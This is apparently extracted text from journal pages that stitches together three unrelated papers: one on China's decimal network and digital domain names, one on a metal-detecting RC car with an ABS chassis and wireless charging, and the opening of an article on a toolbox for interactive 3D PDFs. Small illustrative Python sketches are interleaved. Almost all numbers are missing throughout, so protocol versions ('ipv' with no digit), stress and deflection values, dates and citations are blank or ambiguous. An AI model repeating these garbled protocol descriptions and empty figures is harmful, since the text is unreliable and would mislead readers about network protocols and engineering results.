internet intelligent terminal domain name. the coding of digital domain name refers to the telephone coding rules. it adopts a hierarchical structure according to different regions and consists of root, country/region, and city and user code from top to bottom. digital domain names provide users with an alternative to english domain names. at the same time, they have the following characteristics: ● use of class telephone numbers to facilitate domain name management and division; ● make it easier and faster to browse the internet on smart terminals in the future; ● provides conditions for the realization of network end-to-end communication in the future; ● number resources can be integrated to facilitate the integration of the three networks. decimal network introduced the digital domain name system, and can be compatible with english domain name, chinese domain name system. through international journal of advanced network, monitoring and controls volume , no. , the dns of the domain name server, the digital domain name entered by the user is converted into the corresponding ip address to achieve the purpose of accessing the host. currently, ddns maps digital domain names to dynamic ip addresses by installing a small program on the client side. 
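The registration mechanism described in the following paragraph — the client reports its digital domain name together with its current dynamic IP address, the server records the binding for resolution and removes it again when the user goes offline — can be pictured with the minimal sketch below. The class and method names are illustrative only and do not correspond to any published DDNS implementation.

```python
# Minimal sketch of a dynamic digital-domain-name registry; the real DDNS
# protocol details are not modelled and all names/addresses are placeholders.
from typing import Optional


class DigitalDomainNameRegistry:
    def __init__(self) -> None:
        self._bindings = {}                 # digital domain name -> dynamic IP

    def register(self, digital_name: str, dynamic_ip: str) -> None:
        """Called when the client dials up and reports its current address."""
        if not digital_name.isdigit():
            raise ValueError("digital domain names consist of digits only")
        self._bindings[digital_name] = dynamic_ip

    def unregister(self, digital_name: str) -> None:
        """Called when the user goes offline; the binding is removed."""
        self._bindings.pop(digital_name, None)

    def resolve(self, digital_name: str) -> Optional[str]:
        """Look up the dynamic IP currently bound to a digital domain name."""
        return self._bindings.get(digital_name)


registry = DigitalDomainNameRegistry()
registry.register("8612345678", "203.0.113.17")    # placeholder name/address
print(registry.resolve("8612345678"))              # -> 203.0.113.17
registry.unregister("8612345678")                  # user goes offline
```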
when the user dial-up internet access, the user will be dynamic ip address and user's digital domain name information notification server, the server will be the user's digital domain name and dynamic ip address registered in the ddns resolution system, and then began to provide digital domain name resolution services. when the user is offline, the user's digital domain name information is removed from the ddns resolution system. at present, digital domain name system and ipv protocol has been recognized by some countries and regions. china has developed some ipv related network equipment and systems, solved the problem of interconnection between ipv network and ipv network, and realized the independent function of domain name resolution, domain name allocation, ip address allocation and mac address allocation. after several years of trial operation, the experimental system established in jinshan county, changning district and fujian province has been successfully tested in five small projects. the shanghai experimental area is connected to ipv networks in beijing and hangzhou by tunnel. in addition, various applications based on the ipv decimal network have been developed or are being developed. iii. ipv protocol family ipv protocol family is a decimal network base protocol, including ipv header protocol, address protocol and transition protocol. a. ipv header protocol ipv packet header format and field meaning are specified, including basic header and extended header. ) basic headers the basic header format specified in the ipv header protocol is shown in table . table i. ipv header format version category flow label payload length under one head hop limit source address the destination address version: the length is bits, indicating the protocol version number. category: length bits, to as priority values. the priority classes through are used to specify communication settings and are used by packet senders to control traffic. to is used to specify traffic that will not fall back in the event of congestion. and assign audio and video, called absolute values, to ensure uninterrupted transmission of audio and video. others are reserved values. ● stream label: a length of bits, used to identify packets belonging to the same traffic. ● net charge length: the length is bits, indicating the number of bytes of the packet behind the ipv header. ● next header: the length is bits, which indicates the protocol type in the header field that follows the ipv header. international journal of advanced network, monitoring and controls volume , no. , ● jump limit: the length is bits, indicating the maximum number of times the packet can be forwarded by the node. ● source address: the length is bit, representing the sender address. ● destination address: the length is bit, representing the recipient address. ) extended headers between the packet ipv header and the high-level protocol header, there may be specialized headers, called extended headers, to represent optional internet layer information. the number of extended headers is small, and each is identified by a different next header value. the ipv packet can come with no or multiple extended headers, which need to be defined by the next header field in the previous header. the extended header of ipv protocol includes six types: segment selection, route selection, segmentation, destination options, identification and encapsulation of security payloads. 
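As a rough illustration of the basic header layout listed above, the sketch below packs the fields into a byte string. The exact bit widths are not legible in the source text, so IPv6-like widths are assumed (4-bit version, 8-bit category, 20-bit flow label, 16-bit payload length, 8-bit next header, 8-bit hop limit) together with 256-bit source and destination addresses; this is an illustration of the field order only, not an implementation of the standard.

```python
# Illustrative packing of a "basic header"; field widths are assumptions.
def pack_basic_header(version, category, flow_label,
                      payload_length, next_header, hop_limit,
                      src_addr, dst_addr):
    # First 32 bits: 4-bit version, 8-bit category, 20-bit flow label.
    word0 = (version << 28) | (category << 20) | flow_label
    header = word0.to_bytes(4, "big")
    header += payload_length.to_bytes(2, "big")    # bytes following the header
    header += bytes([next_header, hop_limit])
    header += src_addr.to_bytes(32, "big")         # 256-bit source address
    header += dst_addr.to_bytes(32, "big")         # 256-bit destination address
    return header


hdr = pack_basic_header(version=9, category=0, flow_label=1,
                        payload_length=512, next_header=6, hop_limit=64,
                        src_addr=1, dst_addr=2)
assert len(hdr) == 72   # 8 bytes of fixed fields plus two 32-byte addresses
```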
according to the ipv header protocol, ipv header adopts the form of basic header + extended header chain. compared to the ipv header, the ipv header has removed the header length field and replaced the type of service field with the traffic class field. the protocol type and time-to-live (ttl) fields have been renamed and slightly modified. in addition, the flow label field has been added. although the total length of the ipv base header is nearly four times that of the default ipv header ( bytes), to bytes, it is actually simplified. because the vast majority of the header is occupied by two -byte ipv addresses, the rest of the header takes up only eight bytes. b. ipv address protocol the ipv address protocol specifies that the ipv address is bits, enabling a large addressing space of . according to the data transmission mode, it can be divided into unicast, on-demand and multicast. in addition, the addressing model of ipv , text representation of ipv address, text representation of address prefix, address type representation, monocular address, multiple destinations address and other contents are also specified. ● ipv addressing model: specifies that all types of ipv addresses are assigned to interfaces, not nodes. ● textual representation of pv addresses: specifies that ipv addresses use "bracket decimal" notation. ipv addresses can be divided into pure ipv addresses, ipv -compatible ipv addresses, ipv -compatible ipv addresses, special compatible addresses, full decimal addresses, and transitional ipv addresses. for convenience of reading, some abbreviations are specified for text representation of addresses. ● textual representation of address prefixes: address prefixes for ipv addresses are specified to reflect the network hierarchy. ● address type representation: specifies some of the high boot bits of the ipv address as the format prefix fp to indicate different types of ipv addresses. the length of these format prefixes varies. ● monocular address: represents a single network interface. messages addressed to monocular address will be sent to the unique network interface identified by it. the forms of monocular addresses specified in the ipv address protocol include the aggregated global monocular address, the decimal internet address, the domain name decision and assignment organization address, the ipx address, the local ipv monocular address, and the ipv compatible address. international journal of advanced network, monitoring and controls volume , no. , ● multiple destinations address: a class of ipv addresses assigned to multiple network interfaces at the same time. the ipv address protocol states that multiple destinations address addresses are assigned from single-mesh addresses, using the same format as single-mesh addresses. when a monocular address is assigned to multiple network interfaces, it is functionally converted to a multiple destinations address. c. ipv interim agreement the ipv transition protocol specifies the header format of the ipv transition and the definition of the address text representation, addressing model, and node address, including a detailed description of the current transition header and address format defined. the transitional headers used the original ipv header, only changing the version number to to distinguish it from the original ipv header. the transitional address adopts the latter two segments of the ipv address, a total of bits. iv. technical features of ipv decimal network a. 
address space the wealth of ip address resources is undoubtedly an important advantage of the ipv decimal network. due to the -bit address, the theoretical address capacity is , which is said to be able to assign a permanent address to the world's human needs for years, and can be automatically increased sequentially after years. so the address is large enough to solve the ipv address resource constraints. b. digital domain name system digital domain name is an important part of ipv decimal network system, which is compatible with english domain name and chinese domain name. it is impossible to replace english domain names, but it is a good choice for users who are not used to english domain names. in addition, due to digital domain name technology, the decimal network system can be the domain name, ip address, mac address unified representation into decimal text. c. automatic configuration according to ipv plug and play data, ipv supports stateless and stately host address automatic configuration, which uses dhcp of ipv . d. security the special encryption mechanism is adopted to ensure the safe transmission of network data. e. mobility support the ipv decimal network establishes an ipv tunnel between the mobile unit and the home agent, and then relays the packets to the mobile unit's home address received by the "proxy" of the mobile unit through the tunnel to the current location of the mobile unit, so as to realize the support for network terminal mobility. ipv decimal network introduced the digital domain name technology, convenient digital button internet, simplified the difficulty of network management. the expansion of address space and the introduction of security mechanisms have solved the problems faced by ipv networks. support for qos, automatic configuration, and mobility enables it to better meet multiple business requirements. ipv protocol can theoretically meet the requirements of the new generation of internet development. at present, after the experimental verification stage, completed the development of basic hardware equipment, has entered the stage of small-scale application. v. transition technology from ipv to ipv although ipv has many technical features and can solve various problems faced by ipv , ipv has a long history. the ipv decimal network is not likely to replace the huge ipv network in a short time, but will go through a long process of coexistence and transition. drawing on a number of ipv technologies, lpv also international journal of advanced network, monitoring and controls volume , no. , supports the ietf next generation internet transition working group to propose dual stack, tunneling technology, and nat-pt (network address translation/protocol translation). a. dual protocol stack technology this is the simplest way to handle transition problems. this mechanism enables the device to handle both types of protocols by running both pv and ipv stacks on a single device, as shown in table . table ii. structure diagram of double protocol stack the application layer transport layer (tcp/udp protocol) ipv ipv network interface layer the dual stack mechanism is intuitive and easy to understand. the problem is that the dual stack still requires the corresponding host to configure ipv addresses, otherwise it is invalid, which goes against the original intention of using ipv to solve the problem of insufficient ipv addresses. 
in practice, it is impossible for all hosts or terminals to upgrade to support dual stacks, and using dual stacks will increase the burden on hosts and reduce performance. therefore, the application must be combined with other technologies. b. tunneling technology tunneling provides a way to pass ipv data over existing ipv routing systems, as shown in figure . the technical principle is that at the entrance of the tunnel, the router encapsulates the pv data packet into the ipv packet, whose source address and destination address are the ipv addresses of the tunnel entrance and exit respectively. the encapsulated ipv packet will be transmitted through the ipv routing body, and the protocol domain of the packet header is set to . indicates that the load of this packet is an ipv packet, which is taken out and forwarded to the destination station at the exit of the tunnel. ipv network ipv network ipv public networks r r tunnel port tunnel port figure . ipv over ipv tunnels tunneling technology requires modifications only at the entrance and exit of the tunnel, with no other requirements, and is therefore very easy to implement. it is currently the most widely used transition technology, the disadvantage is that ipv host and ipv host cannot achieve direct communication. transitional ipv decimal network supports two tunnel technologies: ipv over ipv and ipv over ipv , which can be divided into automatic configuration and manual configuration according to address configuration. the improved technology includes tunnel agent technology. c. nat - pt nat-pt technology is a protocol translation technology that performs both header and semantic translation (pt) between ipv and ipv packets while performing ipv /ipv address translation (nat). through the introduction of nat-pt router, the intercommunication between ipv sub-net and ipv sub-net can be realized. the network structure is shown in figure . international journal of advanced network, monitoring and controls volume , no. , ipv network ipv network nat-pt router figure . nat-pt network structure diagram nat-pt can solve the problem of tunnel technology and realize direct communication between ipv and ipv host, which is suitable for the initial stage of the transition of ipv network with small scale. vi. conclusion the decimal network is based on the digital domain name and ipv , two core technologies independently developed in china, with independent intellectual property rights. at the same time, it can solve various problems faced by the existing ipv network and meet the requirements of the development of the next generation of internet. if it can be applied and popularized, it will promote the great development of the internet and help china get rid of the situation of being restrained by others in internet technology. however, the establishment and promotion of standards is not a simple technical issue, which involves the interests of various countries and groups. therefore, the popularization of decimal network cannot be accomplished overnight, so it should be supported by the state and applied in government departments, military departments and other departments with higher requirements on network performance and security. and then gradually spread to achieve business operations. at the same time, it is also necessary to coordinate the relationship between domestic and foreign interest groups and promote their international standardization process, so as to finally achieve the goal of completely replacing the existing ipv network. 
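Referring back to the tunnelling principle of Section V.B — the entry router wraps the original packet in an outer packet addressed to the tunnel endpoints and marks the payload type in the protocol field, and the exit router strips the outer header and forwards the inner packet — the schematic sketch below shows the encapsulation and decapsulation steps. The addresses, the protocol marker and the packet representation are placeholders, not the real encoding.

```python
# Schematic IP-in-IP tunnelling across the existing routing system.
def encapsulate(inner_packet: bytes, tunnel_entry: str, tunnel_exit: str) -> dict:
    """At the tunnel entrance: wrap the packet in an outer packet whose
    source and destination are the tunnel endpoint addresses."""
    return {
        "src": tunnel_entry,
        "dst": tunnel_exit,
        "protocol": "encapsulated",      # marks the payload as a tunnelled packet
        "payload": inner_packet,
    }


def decapsulate(outer_packet: dict) -> bytes:
    """At the tunnel exit: take the inner packet out and forward it."""
    assert outer_packet["protocol"] == "encapsulated"
    return outer_packet["payload"]


inner = b"\x09original-packet"                        # placeholder inner packet
outer = encapsulate(inner, "198.51.100.1", "198.51.100.2")
assert decapsulate(outer) == inner
```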
reference [ ] xie jianping, huang changfu. current situation and development of decimal network [j]. information technology and standardization, ( ): - . [ ] huang changfu. interpretation of digital domain name specification [j]. information technology and standardization, ( ): - . [ ] zhang yunghui, jiang xinhua, lin zhangxi. comparison between ipv and ipv [j]. computer engineering, ( ): - . [ ] farinacci d., fuller v., meyer d., lewis d. interworking lisp with ipv and ipv ”, draft-ietf- lisp-interworking- , aug. . [ ] jung h., & koh s.j. mobile optimized future internet”, http://protocol.knu.ac.kr/tech/cpl-tr- - -mofi- .pdf, jun. . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design and analysis of thermoplastic metal detector rc car with wireless charging haifa el-sadi wentworth institute of technology mechanical engineering department boston, ma e-mail: elsadih@wit.edu matthew r. cole, aaron m. denis wentworth institute of technology mechanical engineering department boston, ma derek fernandes wentworth institute of technology mechanical engineering department boston, ma alberto benhamu-chocron wentworth institute of technology mechanical engineering department boston, ma abstract—the rc car industry is a growing industry that will always be a past time for the older generation. this research is focused on a specific type of rc car which is a metal detecting one. metal detectors have been developed for many years. through research there aren’t many metal detecting rc cars on the market. currently it’s extremely limited in range and depth of detection. the goal of this research is to improve, build and test a new rc-metal detector technology. a thermoplastic-abs used to build the chassis of the rc- metal detector. abs is easily machined, sanded, glued and painted. finite element analysis is a powerful tool that allows us to quickly analyze and refine a design. when the chassis fixed at front differential (displacement), the value of the maximum stress and the deflection are higher than when the chassis fixed at rear differential. the maximum deflection is shown as about . inches. this value is the resultant of the deflection in all three directions. this research includes, a cost analysis for each piece of the car, group goals for the rc car and metal detector. a working prototype is designed before moving into the final design phase in order to assure that the best possible product can be produced. there is a wireless charging station that ease the process of recharging the battery. keywords-metal detector; finite element; thermoplastic; rc i. introduction the challenge for this project is to design and build a remote-controlled car that incorporates two features that no other car possesses. rc car owners have tedious work to do every time the car needs to be charged. some components must be taken apart to retrieve the battery to charge it. the wireless charging feature being implemented in the design will eliminate this extra work, while providing a smooth charging operation where no disassembling will take place. the design and development of remotely operated solar- powered mobile metal detector robot is a rescue robot to autonomously operate in detecting the threat of land mines. during the first and second world war, military forces deployed many bombs on land filed to fight between soldiers on the battlefield. 
there were many countries like libya, cambodia and laos had explosive weapons that did not explode when fired or dropped on the ground. in fact, more than twenty thousand people have been killed or injured by unexploded bombs [ ]. a remotely solar-powered mobile metal detector robot has been designed and implemented. the system is using rf communication with atmega mcu in embedded system domain. the robot moves in particular direction using the handheld remote. the experimental work has been carried out carefully. the metal detector sensor worked as the required specification for the metal detection sensor. the testing demonstrated that the robot would not pose any performance problem for the installation of the metal detection robot such as the merits and drawbacks of mounting the sensor, cost, support vehicle, handling the cable between the robot and also easiness of the adjustment [ ]. nation et al. [ ] demonstrated the accuracy of hhmd in the identification and localization of metallic foreign bodies. they proposed an emergency room foreign body protocol that uses hhmd as an early screening tool in triage in order to expedite the process of obtaining otolaryngology consultation and potentially shorten the wait time to the operating room or discharge. in instances were outside films are previously performed, hhmd use may be able to minimize the overall radiation exposure to children by obviating the need for repeat radiographs. as the sensitivity is not %, a negative hhmd screening does not negate the need for a standard radiograph in order to avoid missed mfbs. hhmd is best suited for detection of coins, which accounts for the majority of the mfb ingestions, and may not be suitable for all metallic objects since the amount of metal may decrease its sensitivity. holm, katja f et. al. [ ] evaluated a commercially available metal detector for detecting cieds. design. observational study including pacemaker patients (n = ) international journal of advanced network, monitoring and controls volume , no. , and a control group without pacemaker ( n = ). the investigational device was a hand-held metal detector for detecting metal or electricity wiring. results. the metal detector detected the pacemaker in all pacemaker patients and thus exhibited a sensitivity of %. the specificity of the metal detector was %, and the negative predictive value was %. thirteen individuals without pacemakers were falsely identified as having an implanted device due to implanted prosthetic material or elements of clothing. the objective of this research is to design a rc car that will provide a smooth wireless charging process and incorporate a metal detector. rc cars require tedious work in order to charge the battery. it will offer a wireless charging station where no disassembling of the car will be required. apart from technical innovations, an improved metal detector will be incorporated that will be useful on beaches and in parks to search for lost jewelry. a long-term goal with an unlimited budget is to use this car to detect mines for the army. this car could drive over the field before infantry and passenger vehicles drive over it to protect them from mines or ieds. ii. material and cost acrylonitrile butadiene styrene (abs) is an opaque thermoplastic and amorphous polymer. abs becomes liquid at a certain temperature, degrees fahrenheit. they can be heated to their melting point, cooled, and re-heated again without significant degradation. 
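The role of the elastic modulus noted above — a material with a higher E deflects less under the same load — can be illustrated with a textbook cantilever estimate. The load, geometry and modulus values below are placeholders (the chassis itself was analysed in SolidWorks with a tetrahedral mesh), so this is a back-of-the-envelope sketch rather than a reproduction of the reported FEA results.

```python
# Cantilever tip deflection delta = F * L**3 / (3 * E * I) for a rectangular
# cross-section; every number here is a placeholder for illustration only.
def tip_deflection(force_lbf: float, length_in: float,
                   width_in: float, thickness_in: float,
                   elastic_modulus_psi: float) -> float:
    second_moment = width_in * thickness_in ** 3 / 12.0   # I for a rectangle
    return force_lbf * length_in ** 3 / (3.0 * elastic_modulus_psi * second_moment)


abs_modulus_psi = 300_000.0          # assumed order of magnitude for ABS
aluminum_modulus_psi = 10_000_000.0  # typical value for aluminium, for contrast

for name, e in [("ABS", abs_modulus_psi), ("aluminium", aluminum_modulus_psi)]:
    d = tip_deflection(force_lbf=10.0, length_in=12.0,
                       width_in=3.0, thickness_in=0.5, elastic_modulus_psi=e)
    print(f"{name}: {d:.3f} in")     # the stiffer material deflects less
```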
instead of burning, thermoplastics like abs liquefy which allows them to be easily injection molded and then subsequently recycled. abs is easily machined, sanded, glued and painted. this makes it a great material for prototyping. table shows the required material to build the rc-car metal detector. table i. the material and the components of rc-car metal detector a. finite element analysis of material solidworks simulation uses the displacement formulation of the finite element method to calculate component displacements, strains, and stresses under internal and external loads. the geometry under analysis is discretized using tetrahedral ( d), and solved by iterative solver. solidworks simulation using p adaptive element type, the solution has converged. the material parameters were obtained and the results were simulated. one of the most important inputs to the model is the elastic modulus e of the material. the elastic modulus defines the stiffness (resistance to deflection) of the material. its value is determined from material tests. a material with a high value of e will deflect less than one with a lower value of e. by applying finite element analysis, we can accurately observe the stress distributions in the various layers of the material as shown in figures , , and . figure shows chassis fixed at rear differential, the highest stress is psi with mesh size was . . however, the maximum deflection was . inches as shown in figure . simulates impact on underside of chassis. b. abs plastic material data elastic modulus: . psi, shear modulus: . psi, and tensile strength: . psi international journal of advanced network, monitoring and controls volume , no. , figure . chassis fixed at rear differential (von mises) figure . chassis fixed at rear differential (displacement) figure shows chassis fixed at front differential (displacement), the highest stress is psi with mesh size was . . however, the maximum deflection was . inches as shown in figure , it simulates impact on underside of chassis international journal of advanced network, monitoring and controls volume , no. , figure . chassis fixed at front differential (von mises) figure . chassis fixed at front differential (displacement) iii. design prototype and testing one of the biggest challenges was designing a chassis from scratch that would house all the components necessary to operate a rc car. the chassis also needed to be strong enough to not only hold the weight of the car and all its components, as shown in figure , but also handle the torque and power that would be outputted from the car. the designed chassis was more than suitable to hold all the components and handle the force of the motor. there was more room than anticipated, which was useful for placing the components and keeping things away from all the moving parts. in the end, the rc car is programmed and moves as planned. the metal detector detects deeper than expected. finally, the wireless charging station works better than anticipated. figure shows the wireless charging ramp setup. international journal of advanced network, monitoring and controls volume , no. , figure . detailed picture of all components figure . layout of the electrical circuit figure shows the layout of the electrical circuit of the rc-car metal detector. the main circuit is powered by a battery through a mechanical switch. if the switch is turned on, power is supplied to a motor and a servo. the speed of the motor is regulated by an electronic speed control circuit (esc). 
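As the next paragraph notes, the steering servo is controlled by a Raspberry Pi, while the ESC regulates motor speed from a throttle-style input. A minimal sketch of generating two 50 Hz PWM signals with the RPi.GPIO library is shown below; the pin numbers and duty cycles are assumptions, and driving the ESC from the same Pi is likewise an assumption rather than something stated in the text.

```python
# Minimal sketch: steering servo and ESC throttle driven by 50 Hz PWM from a
# Raspberry Pi. Pin numbers and duty cycles are placeholders.
import time
import RPi.GPIO as GPIO

SERVO_PIN, ESC_PIN = 18, 13          # assumed BCM pin numbers

GPIO.setmode(GPIO.BCM)
GPIO.setup(SERVO_PIN, GPIO.OUT)
GPIO.setup(ESC_PIN, GPIO.OUT)

servo = GPIO.PWM(SERVO_PIN, 50)      # hobby servos and ESCs expect ~50 Hz
esc = GPIO.PWM(ESC_PIN, 50)
servo.start(7.5)                     # ~1.5 ms pulse: steering centred
esc.start(7.5)                       # ~1.5 ms pulse: throttle neutral

try:
    servo.ChangeDutyCycle(10.0)      # steer to one side (~2 ms pulse)
    esc.ChangeDutyCycle(8.0)         # gentle forward throttle
    time.sleep(2)
finally:
    servo.stop()
    esc.stop()
    GPIO.cleanup()
```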
the servo on the hand is controlled by a raspberry pi computer board. the circuit also has four terminals that are used to connect to an external charger once the battery has depleted. figure . wireless charging ramp setup figure . final prototype iv. conclusion this project aimed at creating a thermoplastic rc car designed with a purpose, more than just an average recreational toy. this was bringing up the reality of a much greater idea. the wireless charging aspect of the rc car will mostly be aimed towards small scale vehicles. however, the metal detection can be a very realistic and useful application for much bigger vehicles. the idea that an unmanned vehicle can be used for detecting not only metals, but harmful objects could potentially be a breakthrough for something like the military. ied’s are a very serious issue for the military, being able to sniff these out without having to risk the lives of anyone would be huge. completing this project with a limited budget would show a lot, especially when someone like the military could spend endless amounts of money in order to perfect the system for more dangerous and life like scenarios. fea analysis was used to test the chassis, when the chassis fixed at front differential (displacement), international journal of advanced network, monitoring and controls volume , no. , the value of the maximum stress and the deflection are higher than when the chassis fixed at rear differential. v. acknowledgements the authors sincerely appreciate the immense and highly valued support from the dean of engineering, dean fred driscoll references [ ] handicap international, fatal footprint: the global human impact of cluster munitions. november . available from: url: http://www.mineaction.org [ ] f.y.c. albert, c.h.s. mason, c.k.j. kiing, k.s. ee, k.w. chan, “remotely operated solar-powered mobile metal detector robot”, procedia computer science, volume , , pages - [ ] nation, javan and jiang, wen, “the utility of a handheld metal detector in detection and localization of pediatric metallic foreign body ingestion”, international journal of pediatric otorhinolaryngology january : - [ ] holm, katja f, hjortshøj, søren, pehrson, steen, svendsen, jesper hastrup, riahi, sam, “implanted cardiac devices are reliably detected by commercially available metal detectors”, scandinavian cardiovascular journal. oct , vol. issue , p - . p. http://www.mineaction.org/ submitted february accepted may published june corresponding author axel newe, axel.newe@fau.de academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright newe distributed under creative commons cc-by . open access enriching scientific publications with interactive d pdf: an integrated toolbox for creating ready-to-publish figures axel newe medical applications team, method park engineering gmbh, erlangen, germany chair of medical informatics, friedrich-alexander universität erlangen-nürnberg, erlangen, germany abstract three-dimensional ( d) data of many kinds is produced at an increasing rate throughout all scientific disciplines. the portable document format (pdf) is the de-facto standard for the exchange of electronic documents and allows for embedding three-dimensional models. therefore, it is a well-suited medium for the visualization and the publication of this kind of data. the generation of the appropriate files has been cumbersome so far. 
this article presents the first release of a software toolbox which integrates the complete workflow for generating d model files and ready-to-publish d pdf documents for scholarly publications in a consolidated working environment. it can be used out-of-the-box as a simple working tool or as a basis for specifically tailored solutions. a comprehensive documentation, an example project and a project wizard facilitate the customization. it is available royalty-free and for windows, macos and linux. subjects computer vision, data science, digital libraries, emerging technologies, scientific computing and simulation keywords portable document format, d-pdf, pdf, u d, universal d, application introduction throughout many scientific disciplines, the availability—and thus the importance—of three-dimensional ( d) data has grown in the recent years. consequently, this data is often the basis for scientific publications, and in order to avoid a loss of information, the visualization of this data should be d whenever possible (tory & möller, ). in contrary to that, almost all contemporary visualization means (paper printouts, computer screens, etc.) only provide a two-dimensional ( d) interface. the most common workaround for this limitation is to project the d data onto the available d plane (newe, ), which results in the so-called ‘‘ . d visualization’’ (tory & möller, ). this projection yields two main problems: limited depth perception and objects that occlude each other. a simple but effective solution of these problems is interaction: by changing the projection angle of a . d visualization (i.e., by changing the point of view), depth perception is improved (tory & möller, ), and at the same time objects that had previously been occluded (e.g., the backside) can be brought to sight. a means of application of this simple solution has been available for many years: the portable document format (pdf) from adobe (adobe, ). this file format is the how to cite this article newe ( ), enriching scientific publications with interactive d pdf: an integrated toolbox for creating ready- to-publish figures. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:axel.newe@fau.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. de-facto standard for the exchange of electronic documents and almost every scientific article that is published nowadays is available as pdf—as well as even articles of the middle of the last century (hugh-jones, ). pdf allows for embedding d models and the adobe reader (http://get.adobe.com/reader/otherversions/) can be used to display these models interactively. nevertheless, this technology seems not to have found broad acceptance among the scientific community until now, although journals encourage authors to use this technology (maunsell, ; elsevier, ). one reason might be that the creation of the appropriate model files and of the final pdf documents is still cumbersome. not everything that is technically possible is accepted by those who are expected to embrace the innovation if the application of this innovation is hampered by inconveniences (hurd, ). 
generally suitable protocols and procedures have been proposed by a number of authors before, but they all required a toolchain of at least three (kumar et al., ; danz & katsaros, ) or even four (phelps, naeger & marcovici, ; lautenschlager, ) different software applications and up to single steps until the final pdf was created. furthermore, some of the proposed workflows were limited to a certain operating system (os) (phelps, naeger & marcovici, ), required programming skills (barnes et al., ) or relied on commercial software (ruthensteiner & heß, ). especially the latter might be an important limiting factor which hampers the proliferation of the d pdf format in scientific publishing (lautenschlager, ; newe, ). this article presents a comprehensive and highly integrated software tool for the creation of both the d model files (which can be embedded into pdf documents) and the final, ready-to-publish pdf documents with embedded interactive d figures. the presented solution is based on mevislab, available for all major operating systems (windows, macos and linux) and requires no commercial license. the source code is available but does not necessarily need to be compiled since binary add-on installers for all platforms are available. a detailed online documentation, an example project and an integrated wizard facilitate re-use and customization. background and related work the portable document format the portable document format is a document description standard for the definition of electronic documents independent of the software, the hardware or the operating system that is used for creating or consuming (displaying, printing...) it (adobe, a). a pdf file can comprise all necessary information and all resources to completely describe the layout and the content of an electronic document, including texts, fonts, images and multimedia elements like audio, movies or d models. therefore, it fulfils all requirements for an interactive publication document as proposed by thoma et al., ( ). although it is an iso standard (iso - : (iso, )), the specification is available to the full extent from the original developer adobe (adobe, ) and can be used royalty-free. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://get.adobe.com/reader/otherversions/ http://dx.doi.org/ . /peerj-cs. table number of publications related to d pdfs in biomedical sciences since (not compre- hensive). year number of publications with embedded/supplemental d pdf number of publications dealing with/mentioning d pdf – – embedding d models into pdf the fifth edition of the pdf specification (pdf version . (adobe, )), published in , was the first to support so-called ‘‘ d artwork’’ as an embedded multimedia feature. in january , the acrobat product family provided the first implementation of tools for creating and displaying these d models (adobe, ). the latest version (pdf version . (adobe, a)) supports three types of geometry (meshes, polylines and point clouds), textures, animations, render modes, lighting schemes and several other features. the only d file format that is supported by the iso standard (iso, ) is universal d (u d, see section below). support for another d format (product representation compact, prc) has been added by adobe (adobe, b) and has been proposed to be integrated into the replacement norm iso - (pdf . ). however, this new standard is currently only available as draft version (iso, ) and has not yet been adopted. 
although the first application in scientific context was proposed in november (zlatanova & verbree, ) and thus quite soon after this new technology was available, it took three more years before the first applications were really demonstrated in scholarly articles (ruthensteiner & heß, ; kumar et al., ; barnes & fluke, ). since then, the number of publications that apply pdf d technology either in theory or in practice has increased almost every year (table ). the most sophisticated implementation so far is the reporting of planning results for liver surgery where the pdf roots are hidden behind a user interface which emulates a stand-alone software application (newe, becker & schenk, ). the universal d (u d) file format as outlined above, the u d file format is the only d format that is supported by the current iso specification of pdf. initially designed as an exchange format for computer aided construction (cad), it was later standardized by ecma international (formerly known as european computer manufacturers association, ecma) as ecma- (universal d file format). the latest version is the th edition from june (ecma, ). newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. u d is a binary file format that comprises all information to describe a d scene graph. a u d scene consists of an arbitrary number of objects that can be sorted in an object tree. the geometry of each object can be defined as a triangular mesh, a set of lines or a set of points. a proprietary bit encoding algorithm allows for a highly compressed storage of the geometry data. a number of additional features and entities (textures, lighting, views, animations) can be defined; details are described in previously published articles (newe & ganslandt, ). the scholarly publishing company elsevier invites authors to supplement their articles with d models in u d format (elsevier, ) and many d software tools provide the possibility to export in u d format. however, most of them are commercial software, but open source solutions like meshlab (http://meshlab.sourceforge.net/) are available as well. creating d model files and pdf documents although many tools and libraries are available that support the creation of d model files and of final pdf documents, the whole process is still cumbersome. the problems are manifold: some tools require programming skills; some do not support features those are of interest for scientific d data (like polylines (newe, ) and point clouds barnes & fluke, ). operating system platform support is another issue, as well as royalty-free use. as regards the creation of the d model files, most of these problems have been addressed in a previous article (newe, ). the main problem, however, remains the creation of the final pdfs. specifying the content and (in particular) the layout of a document can be a complex task and is usually the domain of highly specialized word processor software. figures and supplements for scholarly publications, on the other hand, usually have a specific layout where only the contents of (a limited number of) pre-defined elements vary. there are at least three common elements for a scientific figure: the figure itself, a short caption text and a longer descriptive text. 
if the figure is intended to be provided as supplemental information file instead of being integrated into the main article text, some additional information is necessary as well: at least a general headline and an optional reference to the main article should be provided. if the document content is modularized to these five key elements (fig. ), the creation of the pdf itself becomes a rather simple task, because the layout can be pre-defined. one last difficulty arises from a peculiarity of interactive d figures in pdf: the number viewing options (e.g., camera angle, zoom, lighting...) is nearly unlimited. although such a figure is intended to provide all these options, an author usually wants to define an initial view at the objects, if only to simply ensure that all objects are visible. no freely available tool for pdf creation currently provides a feature to pre-define such a view. the movie package for latex (grahn, ) provides a mechanism do determine the view parameters, but that requires the generation of intermediate pdfs. finally it must be mentioned that many previously published d models are very large—sometimes up to nearly megabytes (krause et al., ). in most cases, this size could (and should) be reduced significantly, because the density of polygon meshes does usually not need to be very high for illustrative purposes. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://meshlab.sourceforge.net/ http://dx.doi.org/ . /peerj-cs. figure general layout of a scholarly figure if provided as supplemental material mevislab mevislab is a framework for image processing and an environment for visual development, published by mevis medical solutions ag and fraunhofer mevis in bremen, germany. it is available via download (http://www.mevislab.de/download/) for all major platforms (microsoft windows, mac os and linux) and has a licensing option which is free for use in non-commercial organizations and research (‘‘mevislab sdk unregistered’’ license, http://www.mevislab.de/mevislab/versions-and-licensing/). beside the development features, mevislab can be used as a framework for creating sophisticated applications with graphical 